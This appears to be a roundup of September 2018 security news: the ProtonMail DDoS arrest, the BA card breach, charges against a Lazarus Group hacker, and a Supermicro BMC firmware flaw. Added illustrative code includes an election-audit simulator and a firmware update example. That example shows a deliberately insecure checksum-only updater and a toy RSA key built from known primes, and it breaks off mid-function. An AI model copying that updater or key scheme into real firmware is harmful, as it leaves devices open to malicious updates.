Apple removed the popular app Adware Doctor because it steals user browsing history

Opsec Mistakes Allowed U.S. to Link North Korean Man to Hacks

Police arrested Apophis Squad member responsible for ProtonMail DDoS attack

Privacy-oriented Linux OS Tails 3.9 is out, what's new?

Researchers Discover New "Fallout" Exploit Kit

Russian citizen behind JPMorgan Chase and Dow Jones attacks has been extradited to US

U.K. Teen Involved in ProtonMail DDoS Attack Arrested
8.9.2018 securityweek Crime

ProtonMail has helped law enforcement identify one of the members of the Apophis Squad, a group that has made bomb threats and launched distributed denial-of-service (DDoS) attacks against many organizations.

The U.K. National Crime Agency (NCA) announced this week that a 19-year-old from Hertfordshire was arrested on August 31. The teen, George Duke-Cohan, remains in custody after he pleaded guilty to three counts of making hoax bomb threats.

Duke-Cohan is said to be the leader of Apophis Squad, which has sent bomb threats to thousands of schools in the United Kingdom and the United States. The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

While the charges in the U.K. focus on the hoax bomb threats, Apophis Squad is also known for launching DDoS attacks against encrypted email provider ProtonMail, cybersecurity journalist Brian Krebs, the DEF CON hacking conference, and government agencies in several countries. Its attacks and DDoS-for-hire services have apparently been inspired by the notorious Lizard Squad, whose members were also identified and charged by authorities.

ProtonMail reported in late June that it had been hit by a significant DDoS attack that caused some delays in the delivery of emails. The organization initially said a group linked to Russia had been behind the attack – Apophis Squad’s Twitter account claims the group is from Russia – but Radware, which helped ProtonMail mitigate the attack, later clarified that the attackers were actually based in the U.K.

In a blog post published on Thursday, ProtonMail Founder Andy Yen revealed that his organization helped authorities identify Duke-Cohan and other members of his group after learning that they had all been using ProtonMail.

It turns out that while Duke-Cohan and others claimed law enforcement would never be able to find them, they actually had poor operational security (opsec) practices and they even allowed their own servers to be breached.

Evidence collected from its own systems by ProtonMail and information from Brian Krebs helped identify Duke-Cohan as a member of Apophis Squad in the first week of August. However, British police only arrested him in late August after he threatened to make more bomb threats once school started in September.

The Twitter account used by Apophis Squad has not been active since August 31.

“We believe further charges are pending, along with possible extradition to the US,” Yen said.

ProtonMail aims to protect the privacy of its users, but warned that it does not protect individuals involved in criminal activities.

“That’s why we will investigate to the fullest extent possible anyone who attacks ProtonMail or uses our platform for crime. We will also cooperate with law enforcement agencies within the framework of Swiss law,” Yen said. “In recent weeks, we have further identified a number of other individuals engaged in attacks against ProtonMail, and we are working with the appropriate authorities to bring them to justice.”

Microsoft to Charge for Windows 7 Security Updates
8.9.2018 securityweek Security

Microsoft this week revealed plans to offer paid Windows 7 Extended Security Updates (ESU) for three years after extended support for the operating system officially ends.

Released in 2009, Windows 7 currently powers around 39% of all machines running Microsoft’s Windows platform, but is slowly losing ground to Windows 10 (currently found on over 48% of Windows systems).

Microsoft stopped selling Windows 7 in 2014 (some variants are still available to OEMs) and ended mainstream support for the operating system in early 2015. The company plans to end extended support for Windows 7 on January 14, 2020.

Past that date, organizations will have to pay in order to continue receiving security updates for the platform.

Paid Windows 7 Extended Security Updates (ESU), Microsoft now says, will be available through January 2023. The tech company will sell the Windows 7 ESU on a per-device basis and plans on increasing the price for it each year.

“Windows 7 ESUs will be available to all Windows 7 Professional and Windows 7 Enterprise customers in Volume Licensing, with a discount to customers with Windows software assurance, Windows 10 Enterprise or Windows 10 Education subscriptions,” Microsoft says.

The software giant also revealed that it will continue to provide support for Office 365 ProPlus on devices with active Windows 7 Extended Security Updates (ESU) through January 2023. This means that those buying the Windows 7 ESU will be able to keep running Office 365 ProPlus for the same period.

January 2023, which is the end-of-support date for Windows 8.1, is also the end-of-support date for Office 365 ProPlus on that platform version, Microsoft now reveals. Windows Server 2016, on the other hand, will support Office 365 ProPlus until October 2025.

Currently, Microsoft is relying on a semi-annual schedule for Windows 10 and Office 365 ProPlus updates, targeting September and March, and the company will continue using this Windows 10 update cycle.

To make sure customers have enough time to plan for updates within their environments, however, Microsoft is making changes to the support life of Windows 10 updates.

Thus, the currently supported feature updates of Windows 10 Enterprise and Education editions (versions 1607, 1703, 1709, and 1803) will be supported for 30 months from their original release date. As for future feature updates, those targeted for a September release will be supported for 30 months, while those targeted for a March release will be supported for 18 months.

According to Microsoft, all feature releases of Windows 10 Home, Windows 10 Pro, and Office 365 ProPlus will continue to be supported for 18 months, regardless of whether targeted for release in March or September.

BA Scrambles to Address Theft of Passenger Bank Details
8.9.2018 securityweek Incident

British Airways will financially compensate customers whose data were stolen in a "sophisticated" and "malicious" hack, chief executive Alex Cruz said Friday as he apologised for the fiasco.

BA late Thursday revealed that personal and financial details of customers who booked flights on the group's website and mobile phone app between August 21 and Wednesday had been stolen.

The revelation comes just a few months after the European Union tightened data protection laws.

"We're extremely sorry for what has happened," Cruz told the BBC on Friday.

"There was a very sophisticated, malicious, criminal attack on our website."

BA took out full-page adverts in the UK newspapers on Friday to apologise to customers, while the share price of parent group IAG was down more than three percent in London deals.

"We are 100 percent committed to compensate them," Cruz said.

"We will compensate them for any financial hardship that they may have suffered," he told the broadcaster.

BA said it had launched an urgent investigation after realising that the details of about 380,000 payment cards used to book its flights had been compromised.

The stolen data comprised customer names, postal addresses, email addresses and credit card information.

However, the 15-day breach did not involve travel or passport details, and the issue has been fixed, the airline added.

- Regulators investigate -

"The moment we found out (Wednesday) that actual customer data had been compromised, that's when we began an all out immediate communication to our customers. That was our priority," Cruz said.

However Enza Iannopollo, privacy and security analyst at advisory group Forrester, said BA could have done better on informing those affected.

"If the timeline is confirmed and BA became aware of the breach on the evening of September 5th, then they have done their breach notification on time, which is of course a good thing," she said in a statement.

"However, customers are obviously not impressed about BA breach management at present. Some discovered it on social media, others reported wasting hours on the phone with their bank, everyone expects more from a company that truly cares about its customers."

"Terrible handling of the situation," tweeted one affected customer, Mat Thomas.

Iannopollo told AFP that it was too early to know whether BA would be fined over the affair.

"Regulators will assess the circumstances of this breach consistently with GDPR requirements," she said referring to the EU's General Data Protection Regulation that came into force in May.

Britain's National Crime Agency said it was assessing the matter, while the UK's data protection watchdog, the Information Commissioner's Office, will make its own enquiries.

"The ICO will do its assessment and investigation to determine whether to levy a fine or impose any enforcement action, but this will take some time and it might be that the regulator determines that rules were not breached," Iannopollo said.

About 1100 GMT, shares in IAG, which also runs Spanish carriers Iberia and Vueling as well as Irish airline Aer Lingus, were down 3.5 percent at 657.60 pence on London's benchmark FTSE 100 index, which was down 0.8 percent overall.

"Today's news is a reminder of just what a hot issue cyber security remains and the importance of companies having the right protections in place to mitigate the risk posed by attacks," noted Russ Mould, investment director at AJ Bell.

Malware on ICS Increasingly Comes From Internet: Kaspersky
8.9.2018 securityweek ICS

Kaspersky Lab products installed on industrial automation systems have detected over 19,000 malware samples in the first half of 2018, and the company has determined that the Internet is an increasingly significant source of attacks.

According to Kaspersky’s “Threat Landscape for Industrial Automation Systems” report for H1 2018, the company detected over 19,400 samples belonging to roughly 2,800 malware families. As expected, most of the attempts to infect industrial systems were part of random attacks rather than targeted operations.

An overall increase in malicious activity has led to attack attempts against 41.2% of the industrial control systems (ICS) protected by the security firm, which represents an increase of nearly 5 percentage points compared to the first half of 2017. Kaspersky detected 18,000 malware samples belonging to more than 2,500 families in that period.

Attacks were reported all around the world, but Asian, Latin American and North African countries had the highest percentage of attacked ICS computers, with up to 75% of devices targeted. In the United States, only 21.4% of industrial systems were targeted. Kaspersky noted that developed countries had recorded fewer attacks compared to ones with a low per capita GDP.

ICS attacks in H1 2018

A majority of the detected threats were Trojans using either Windows or web browsers as a platform.

“In H1 2018, threat actors continued to attack legitimate websites that had vulnerabilities in their web applications in order to host malware components on these websites,” Kaspersky said in its report. “Notably, the increase in the percentage of ICS computers attacked through browsers in H1 2018 was due to the increase in the number of attacks that involved JavaScript cryptocurrency miners. At the same time, the increase in the number of ICS computers attacked using Microsoft Office documents was associated with waves of phishing emails.”

The security firm determined that the Internet was the source in 27.3% of attacks, which represents an increase of nearly 7 percentage points compared to the same period of last year. Removable media accounted for 8.4% and email clients for 3.8% of attacks, with no significant changes compared to the prior period.

“This pattern seems logical: modern industrial networks can hardly be considered isolated from external systems. Today, an interface between the industrial network and the corporate network is needed both to control industrial processes and to provide administration for industrial networks and systems,” Kaspersky said.

Asia, Africa and Latin America are not only the most targeted, but they also represent the main sources of threats blocked by Kaspersky’s products.

Homeland Security Head: Colorado Tops US in Vote Security
8.9.2018 securityweek BigBrothers

Colorado, whose election systems are ranked among the nation's safest, held a cyber-security and disaster exercise Thursday for dozens of state, county and federal elections officials to reinforce the state's preparedness for, and public confidence in, November's midterm elections.

Participants included Department of Homeland Security cyber experts working with county elections clerks to confront a rapid-fire sequence of scenarios. In a brief appearance, Homeland Security Secretary Kirstjen Nielsen praised Colorado as a national leader in safeguarding elections.

On Wednesday, Nielsen called election security one of the nation's highest priorities. She said the biggest threats are coming online from malicious nation-states seeking to disrupt democracy.

The U.S. intelligence community has said Russia had tried to influence the 2016 election to benefit President Donald Trump. Nielsen frequently has said the Russians attempted to sow discord and undermine faith in the democratic process and, over time, developed a preference for then-candidate Trump.

On Thursday, Nielsen reiterated her concerns about potential Russian hacking or interference, particularly of voter databases this year. But she said no attempts have been detected so far that match the scale of the 2016 effort.

"Any attempt to interfere in our elections is a direct attack on our democracy and is unacceptable," Nielsen told participants at a Denver hotel. Turning to Colorado's record, she declared: "We'd love to continue to use you as an example of what other states can adopt."

Among those practices, she said, her department wants all 50 states to conduct post-election risk-limiting audits, which statistically verify the accuracy of reported vote counts, by 2020. It is already standard practice in Colorado.
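A risk-limiting audit is a statistical check rather than a full recount: ballots are drawn at random and interpreted by hand until the evidence that the reported winner really won is strong enough, or the audit escalates to a full hand count. The block below is an added illustration, not code from this article, from Colorado, or from DHS; it implements BRAVO, one widely used ballot-polling RLA design, for a two-candidate contest. The 600-400 reported tally, the ballot manifest, the 5 percent risk limit and the random seed are all constructed for the example.

```python
"""Ballot-polling risk-limiting audit (BRAVO) for a two-candidate contest.

Added illustration; not code from the article, from Colorado, or from DHS.
BRAVO (Lindeman, Stark & Yates, 2012) is a sequential likelihood-ratio test:
each hand-interpreted ballot updates a statistic comparing the reported winner
share against the hypothesis that the contest was actually tied or lost. When the
statistic reaches 1/risk_limit the reported outcome is confirmed; if the sample is
exhausted first, the audit escalates to a full hand count.
"""
import math
import random


def bravo_audit(reported_winner, reported_loser, sampled_ballots, risk_limit=0.05):
    """Run BRAVO over an iterable of hand-interpreted ballots.

    reported_winner / reported_loser: reported vote totals for the two candidates.
    sampled_ballots: ballot interpretations in the random order they were drawn:
        "W" = ballot for the reported winner, "L" = for the reported loser,
        anything else = undervote / other (leaves the statistic unchanged).
    Returns (confirmed, ballots_examined, test_statistic).
    """
    total = reported_winner + reported_loser
    if total == 0 or reported_winner <= reported_loser:
        raise ValueError("reported winner must have a strict majority of the two-way vote")
    s_w = reported_winner / total          # reported winner share, strictly above 0.5
    threshold = 1.0 / risk_limit           # e.g. 20 for a 5 % risk limit
    t = 1.0                                # likelihood ratio: reported share vs a tie (0.5)
    examined = 0
    for ballot in sampled_ballots:
        examined += 1
        if ballot == "W":
            t *= 2.0 * s_w                 # s_w / 0.5
        elif ballot == "L":
            t *= 2.0 * (1.0 - s_w)         # (1 - s_w) / 0.5
        if t >= threshold:
            return True, examined, t
    return False, examined, t              # sample exhausted: full hand count required


def expected_sample_size(reported_winner, reported_loser, risk_limit=0.05):
    """Rough average number of ballots BRAVO needs when the reported counts are right."""
    s_w = reported_winner / (reported_winner + reported_loser)
    drift = s_w * math.log(2 * s_w) + (1 - s_w) * math.log(2 * (1 - s_w))
    return math.ceil(math.log(1 / risk_limit) / drift)


def simulate(true_winner_ballots, true_loser_ballots, reported_winner, reported_loser,
             risk_limit=0.05, seed=1):
    """Audit a constructed ballot manifest drawn in a seeded random order.

    The manifest is constructed sample data (ballot interpretations), not real ballots.
    Sampling the whole manifest without replacement is a simplification; real audits
    fix a sample size in advance and escalate if the risk limit is not met.
    """
    manifest = ["W"] * true_winner_ballots + ["L"] * true_loser_ballots
    rng = random.Random(seed)
    rng.shuffle(manifest)
    return bravo_audit(reported_winner, reported_loser, manifest, risk_limit)


if __name__ == "__main__":
    # Honest count: reported 600-400 and the ballots really are 600-400.
    ok, n, t = simulate(600, 400, 600, 400)
    print(f"honest tally: confirmed={ok} after {n} ballots "
          f"(expected about {expected_sample_size(600, 400)})")
    # Reported 600-400, but the reported loser actually won 550-450. The audit should
    # refuse to confirm (it can wrongly confirm with probability at most the risk limit)
    # and the contest goes to a full hand count.
    ok, n, t = simulate(450, 550, 600, 400)
    print(f"wrong outcome: confirmed={ok} after {n} ballots -> "
          f"{'stop' if ok else 'full hand count'}")
```

The statistic only grows when sampled ballots agree with the reported margin, so a narrow reported win needs far more ballots than a landslide, and a wrong reported outcome is confirmed with probability no greater than the chosen risk limit. Colorado's audits also rely on the paper trail described below, since a ballot-polling audit is meaningless without a physical ballot to interpret.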

Colorado's Republican Secretary of State, Wayne Williams, said the exercise aimed to increase public confidence that votes are safe.

"So we can tell you that nobody in Russia, nobody in China, nobody anywhere else in the world can change a ballot in Colorado," Williams said.

Colorado was the only one among 21 targeted states to report to Homeland Security — not the other way around — that Russian interests attempted to hack into its systems in 2016, said state elections director Judd Choate.

The state has invested in new vote tabulating machines and creates a separate paper trail of each ballot cast. Since 2013, it has required two-factor authentication for elections systems operators to access equipment. The secretary of state's office has more IT staff than purely elections-related staff, and it has plans, which Choate wouldn't disclose for security reasons, to guarantee security and privacy in the remote case that the state's voter registration database is hacked.

This year, the state also will monitor Facebook, Twitter and Instagram starting well ahead of the election to detect and respond to false rumors about voting procedures, outages, and other voting problems. It also will collect intelligence on efforts to sway voters on social media, Choate said. He noted that Colorado's collaboration with Homeland Security is strong.

Choate warned the dozens of clerks, database experts and others that Thursday's exercise would be tough, involving, among a cascade of other problems, attempts to hack voter rolls, detect possible malware planted in voting systems weeks beforehand, phishing and responding to social media posts claiming systems were hacked or voters turned away. The exercise concerned both the weeks leading up to the election and election day itself.

"Like the worst possible election day and election that you've ever seen in your life. So there's every single disaster that you probably thought couldn't happen, and then about 15 that you wouldn't even have thought through," Choate said.

Paul Huntsberger, database chief for Denver County's elections division, worked with colleagues from across the state responding or devising responses to the disaster scenarios: DEF CON hackers in Las Vegas, electricity outages, security patches, verifying clearances and background checks for personnel, and responding to ransomware attacks in other states.

Throughout, officials masquerading as citizens and news reporters demanded immediate answers to security questions.

"All of this is needed," Huntsberger said during a brief break. "And we're proving that communication, secure communication, is key to making it work."

Talking Global Cyberwar With Kaspersky Lab's Anton Shingarev
8.9.2018 securityweek CyberWar

Cyber War

Theory Suggests we Need to Come to the Very Brink of Cyberwar Before Humanity Backs Down and Finds a Solution

Security firms take a keen interest in the evolution of no-longer fanciful cyberwar -- they will be our first line of defense. Kaspersky Lab takes a particular interest, being both a defender and one of the first victims of this evolution. SecurityWeek spoke to Anton Shingarev, Kaspersky Lab's VP of public affairs.

First, we must understand where we currently stand. Discounting the rogue nations like North Korea and perhaps Iran (more on which later), there is no current cyberwar. There is intrusive surveillance and cyber espionage between potential adversaries -- but that has always been the case.

In May 1960 a U.S. high-altitude spy plane was shot down by the Soviet Union while flying in Soviet airspace. That was very intrusive surveillance with a serious result -- but it did not lead to all-out kinetic warfare between the adversaries. The Cold War never became a Hot War (apart from what could be considered firefights in Korea and Vietnam) because of an intricate set of bilateral and international agreements.

We may have entered the early stages of a state of Cold Cyberwar, but Shingarev hopes and expects that the same type of bilateral and international cyber agreements will prevent a Hot Cyberwar developing and ultimately spilling into a full-scale kinetic war.

This won't prevent serious and damaging effects on the way. Just as the physical globe was balkanized into the major spheres of influence (the U.S. sphere, the Russian sphere, the so-called non-aligned group, and always on the outside, perhaps China), so too is the global internet being balkanized (and to a certain extent along similar geo-political lines).

Kaspersky Lab is a victim of this balkanization. Different regions are promoting local technology over global technology firms, and increasingly distrusting technologies they cannot control. At its worst, whole nations are firewalling themselves from the global internet -- such as China, Iran and North Korea. Even without such firewalls, individual nations place controls on foreign technologies.

Kaspersky Lab is an example. While not being prohibited from use by the public and commerce in general, it is increasingly excluded from western government agencies. There is no proof of wrongdoing, nor is any needed. It is simply a political effect of geo-political balkanization in an era of cold cyberwar. Nor is it one-sided. Other countries prohibit or limit foreign products, and many countries are demanding back doors into a range of communications products.

Right now, things seem to be getting worse. Across the globe, more than 30 countries have officially announced they have a military cyber-division, and verbal threats and counter-threats are common. In May of this year, Air Marshal Phil Collins (Chief of Defence Intelligence, UK Ministry of Defence) made the case for pre-emptive cyber strikes without ruling out pre-emptive kinetic strikes. In the face of "continuous full spectrum competition and confrontation", he said the UK's response "should be to understand first, to decide first, and then if necessary to act first, across the physical and virtual, to secure decision advantage and then operational advantage, seeking swift yet controlled exploitation of vulnerabilities and the proactive denial of opportunities."

In the U.S., in August 2018, the Wall Street Journal reported that President Trump had reversed Obama-era rules on the deployment of cyber weapons -- effectively making it easier for the Pentagon to launch its own cyber-attacks. In October 2017, it was reported that the U.S. Cyber Command had launched a DDoS attack against North Korea's military spy agency, the Reconnaissance General Bureau (RGB).

But despite worsening global tensions, despite increasing balkanization and protectionism, despite Kaspersky Lab being an early victim of this Cold Cyberwar, Anton Shingarev remains hopeful that it can be contained and will not spill over into active kinetic warfare. He draws a parallel with the nuclear threat that came with the original Cold War.

Each side stockpiled nuclear weapons to threaten the other. "But once it was realized that use of these weapons would only guarantee mutual destruction, the world pulled back through bilateral and international agreements," he said. It hasn't rid the world of nuclear weapons, but they are now kept primarily as a deterrence, maintaining the threat of mutual destruction in order to keep the peace.

We haven't reached that stage in cyber yet. Nations are stockpiling cyber weapons in a threatening manner. There are no bilateral or international agreements (apart from existing international law) that will prevent a first or pre-emptive strike. We haven't yet reached the brink of mutual cyber destruction.

Shingarev has no confidence in current attempts to find an international solution. Microsoft has been at the forefront of these, first proposing international norms of behavior and then wrapping these into a call for a Digital Geneva Convention. "Nothing has happened," said Shingarev -- and nothing is likely to happen. Microsoft is calling for international cyber disarmament, which is as likely as the decades-old calls for international nuclear disarmament.

Shingarev believes the way forward will come from bilateral agreements between the world's cyber superpowers, like the 1991 START (Strategic Arms Reduction Treaty) between the U.S. and the Soviet Union. Such agreements would be supported by mutual assistance arrangements, through bodies like the UN and even NATO. These would protect members from rogue countries who refuse to join a no-cyber-strike agreement, or simply ignore it. In theory, it could mean that rogue states like North Korea and perhaps Iran would be punished by the rest of the world, while tiny nation states like Singapore would be protected from aggressors.

Such an approach has succeeded in preventing a nuclear war. Shingarev believes it could prevent an all-out cyberwar that could potentially spill into a kinetic war. But it is brinkmanship of the first order -- the theory suggests we need to come to the very brink of that cyberwar before humanity backs down and finds a solution.

Industry Reactions to U.S. Charging North Korean Hacker: Feedback Friday
8.9.2018 securityweek BigBrothers

A North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the notorious Lazarus Group.

Park Jin Hyok, 34, has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint made public on Thursday focuses on four of the hacker group’s operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Experts comment on U.S. charging Park Jin Hyok with hacking

Investigators have found several links between Park, the Lazarus Group and Chosun Expo Joint Venture, also known as Korea Expo Joint Venture (KEJV), a North Korean government front company allegedly used to support its cyber activities.

Industry professionals have commented on various aspects of the story, including Lazarus Group’s ongoing activities and the impact of the charges brought against Park.

And the feedback begins...

Ed McAndrew, Partner & Co-Chair, Privacy & Data Security Group at Ballard Spahr:

“Why today? Even with the benefit of having served as a federal cybercrime prosecutor for almost 10 years, I’m struggling to understand why the DOJ unsealed this complaint today. There is no imminent activity, law enforcement or otherwise, that supports the unsealing right now. It seems intended only to “name and shame” Hyok and the North Korean Government, for actions that the US Government has already publicly attributed to North Korea.

Why a complaint, instead of a grand jury indictment? The manner of charging Hyok is odd. This is a criminal complaint; not an indictment. Complaints are used to charge people quickly when they have been arrested or are facing imminent arrest. Generally, the DOJ has been using “name and shame” indictments against cybercrime agents of foreign governments. Because Mr. Hyok has not been arrested and is unlikely to ever see the inside of the US courtroom, the use of a complaint here is odd.

I think this indictment will have little tangible impact on Mr. Hyok, unless he is an avid international traveler. He is unlikely to face arrest unless he travels to a country that cooperates with US law enforcement or has an extradition treaty with the United States. It is also likely to have little impact on North Korea, which will almost certainly deny the allegations. The US Government has already accused North Korea of being linked to these criminal actions, so charging one individual who will never face prosecution seems to be of limited value, at best.

There’s also a potential downside to US law enforcement in publicizing this level of detail about the methodology behind cyber investigations and the sources and types of evidence used to attribute cybercriminal activity to a particular individual. The affidavit shows how capable our law enforcement agencies are in tracking cyber bread crumbs and connecting digital dots. However, the affidavit almost certainly will be studied by cybercriminals and nation state actors on how to improve their own operational security and avoid detection in the future. In my view, that potential cost outweighs the benefit of disclosure in this case.”

Eric Chien, technical director, Symantec Security Response:

“What’s perhaps most interesting about the DOJ indictment is that law enforcement was able to identify Park Jin Hyok as part of the Lazarus group by obtaining emails from his Hotmail and Gmail accounts. Surprisingly, Park used the same email accounts for the legitimate software development work, as well as hacking activity attributed to Lazarus. Park’s resume and image were discovered in his email, which helped law enforcement attribute the hacking activity back to him specifically.

We’ll likely see Lazarus move away from these free email services, given they’ll have to re-tool their entire infrastructure, including email accounts, passwords, servers, etc. now that they know they’re being watched. Lately, the group’s main focus has been on cryptocurrency – most of the attacks from the past year that we believe are related to Lazarus have targeted crypto-related victims (i.e. ICO providers, cryptocurrency banks, mining pool providers, etc.). It’s unlikely that this indictment will stop the group entirely – judging from their history, such as the Sony breach and WannaCry, they’re brazen and not scared of getting caught.”

Benjamin Read, senior manager, cyber espionage analysis, FireEye:

“The US Department of Justice’s criminal complaint describing a North Korean national’s role in a wide range of intrusion activity is consistent with FireEye’s analysis of both the scope and attribution of this activity, which we link to the group TEMP.Hermit. While we do not have insight into all of the incidents described in the complaint, our analysis concurs with the conclusion that the actors responsible for multiple financially motivated intrusions, the WannaCry ransomware and many of the other incidents are linked by shared development resources. FireEye has observed these malicious operations continuing at a high pace over the last two years and impacting numerous organizations.

FireEye assisted the US Government with analysis of malware provided by the Department of Justice in support of this effort; however, we cannot comment on the specifics of that analysis. Our company assessments are made based only on data we have independently obtained through Mandiant incident response, FireEye devices and other sources.”

Sherrod DeGrippo, director of threat research and detection, Proofpoint:

“The Lazarus group is still very active. Most recently we profiled the financially motivated arm of the organization and their work targeting South Korean point-of-sale infrastructure and, separately, cryptocurrency wallets and exchanges. The Lazarus Group also includes both disruption and espionage arms engaged in ongoing efforts worldwide.”

Mukul Kumar, Chief Information Security Officer and VP of Cyber Practice, Cavirin:

“Though the Sony Breach hasn’t been in the news for a while, the charges prove that we’re getting better at identifying the ultimate sources of breaches. This of course also applies to non state-sponsored hackers, who may have believed that they could not be tracked.”

Bill Conner, CEO, SonicWall:

“The Sony breach and WannaCry ransomware attacks are milestones for those in the IT industry, as they mark a day we’ll never forget and a distinct moment when the cyber war was brought to the attention of those who were unsuspecting of it. Law enforcement agencies and government officials around the world are challenged by the internet’s invisible borders and its nameless perpetrators when it comes to pursuing or charging cyber criminals. While almost four years have passed since the communications giant sent notifications of its attacks, the U.S. Justice Department’s actions are commendable and should serve as a reminder for consumers and organizations alike to remain vigilant.

In today’s connected world, it is irresponsible to operate online without strict security standards. Total end-to-end security is key, including a layered approach to security across wired, wireless, mobile and cloud networks, as well as securing IoT devices to prevent tampering and unauthorized access.”

David Maxwell, Senior Fellow, FDD:

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm.

The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea.

It is also important the American public knows its government is going after these threats and will relentlessly pursue the perpetrators of cyber attacks.

It is especially important the U.S. goes after North Korea's cyber capabilities because Pyongyang is relying on illicit activities for funding and, ultimately, to support regime survival. Cyber provides the regime with a broad range of capabilities: from stealing funds, to espionage, to influencing social media information, to hacking enemies, and to attacking infrastructure. In many ways, cyber is much more practical and valuable than nuclear weapons.

This supports continued maximum pressure on North Korea, as cyber activities help the regime generate revenue through other means that have been stopped because of sanctions.”

Dmitri Alperovitch, CTO and co-founder of CrowdStrike:

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today. Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.

One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice.”

Flaw in the BMC firmware update process of Supermicro servers allows attackers to deliver persistent malware or brick the server
7.9.2018 securityaffairs

A team of security researchers discovered a vulnerability in the baseboard management controller (BMC) firmware used by Supermicro servers.
Researchers from security firm Eclypsium found that the BMC firmware update mechanism does not verify the signature of the image it is given, a flaw attackers could exploit to deliver persistent malware that survives even a complete wipe and reinstall of the operating system.

“Using the vulnerabilities we discovered, it is possible to make arbitrary modifications to the BMC code and data. Using these modifications, an attacker can run malicious software within these highly privileged management controllers. This could be useful, for example, to survive operating system reinstallation or communicate covertly with the attacker’s infrastructure, similar to the PLATINUM malware that used manageability features to bypass detection.” reads the advisory published by the researchers.

“Alternatively, this vulnerability could be used to “brick” (permanently disable) the BMC or the entire system, creating an impact even more severe than the BlackEnergy KillDisk component.”

Supermicro server BMCs

The Baseboard Management Controller (BMC) is a dedicated microcontroller on the server motherboard that directly controls and monitors the hardware components of the system. Administrators can reach it remotely, typically over IPMI, to repair or reinstall the system software even when the host is powered off.

BMCs are a prized target for attackers because they operate below the host OS and system firmware, so code running there is invisible to the operating system.

The experts discovered that the update mechanism neither verifies a code signature on the firmware image nor checks that the firmware was obtained from a legitimate source.

Exploiting the flaw allows attackers to run malicious code on the BMC that is invisible to OS-level anti-malware solutions.

The attack scenario requires the attacker to be in a man-in-the-middle position, i.e. able to intercept and modify the traffic during the update process.

“Our research has uncovered vulnerabilities in the way that multiple vendors update their BMC firmware. These vendors typically leverage standard, off-the-shelf IPMI management tools instead of developing customized in-house management capabilities.” continues the analysis.

“In this case, we will go deep into the BMC update process on Supermicro systems, we found that the BMC code responsible for processing and applying firmware updates does not perform cryptographic signature verification on the provided firmware image before accepting the update and committing it to non-volatile storage. This effectively allows the attacker to load modified code onto the BMC.”

The researchers highlighted that attackers could exploit the flaw to permanently brick the BMC or the entire server.

“Because IPMI communications can be performed over the BMC LAN interface, this update mechanism could also be exploited remotely if the attacker has been able to capture the admin password for the BMC,” Eclypsium added.

“This requires access to the systems management network, which should be isolated and protected from the production network. However, the implicit trust of management networks and interfaces may generate a false sense of security, leading to otherwise-diligent administrators practicing password reuse for convenience.”

The researchers reported the flaw to Supermicro, which addressed it by adding signature verification to the firmware update tool.
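To make the difference concrete, here is an added example (mine, not Eclypsium's or Supermicro's code) contrasting an update routine that only checks a CRC with one that verifies a vendor signature and an anti-rollback version before committing anything to flash, together with an on-path attacker who swaps the payload and recomputes the checksum. The image format, the toy multi-prime RSA key built from fixed Mersenne primes, the absence of padding and the Python 3.8+ requirement are assumptions made so the example runs on the standard library alone; real firmware should use RSA-PSS or ECDSA from a vetted library, with the public key held in immutable storage.

```python
import hashlib
import struct
import zlib

# --- Toy vendor key (assumption: fixed Mersenne primes so the example needs only the
# standard library; production firmware uses RSA-PSS/ECDSA from a vetted library) ---
_P, _Q, _R = (1 << 89) - 1, (1 << 107) - 1, (1 << 127) - 1      # all Mersenne primes
N = _P * _Q * _R                                                  # ~323-bit modulus
E = 65537
_D = pow(E, -1, (_P - 1) * (_Q - 1) * (_R - 1))                   # stays with the vendor
SIG_LEN = (N.bit_length() + 7) // 8
VENDOR_PUBKEY = (N, E)                                            # what a BMC keeps in ROM

MAGIC = b"BMCI"                                                   # hypothetical image format
HEADER = struct.Struct(">4sIII")     # magic, version, payload length, CRC32 of payload


def _signed_bytes(version, payload):
    # Version is covered by the signature so an attacker cannot relabel an old image.
    return struct.pack(">I", version) + payload


def vendor_sign(version, payload):
    """Vendor side: produce image = header || payload || signature."""
    digest = int.from_bytes(hashlib.sha256(_signed_bytes(version, payload)).digest(), "big")
    sig = pow(digest, _D, N).to_bytes(SIG_LEN, "big")     # textbook RSA, no padding (toy)
    hdr = HEADER.pack(MAGIC, version, len(payload), zlib.crc32(payload))
    return hdr + payload + sig


def parse_image(image):
    magic, version, plen, crc = HEADER.unpack_from(image)
    if magic != MAGIC:
        raise ValueError("bad magic")
    payload = image[HEADER.size:HEADER.size + plen]
    sig = image[HEADER.size + plen:HEADER.size + plen + SIG_LEN]
    if len(payload) != plen or len(sig) != SIG_LEN:
        raise ValueError("truncated image")
    return version, payload, crc, sig


def apply_update_unsigned(image, flash):
    """The flawed pattern: only a checksum guards the write to non-volatile storage."""
    version, payload, crc, _ = parse_image(image)
    if zlib.crc32(payload) != crc:
        return "rejected: crc mismatch"
    flash["version"], flash["code"] = version, payload
    return "committed"


def apply_update_signed(image, flash, pubkey=VENDOR_PUBKEY):
    """Fixed pattern: signature and anti-rollback checks pass before flash is touched."""
    n, e = pubkey
    version, payload, crc, sig = parse_image(image)
    if zlib.crc32(payload) != crc:
        return "rejected: crc mismatch"
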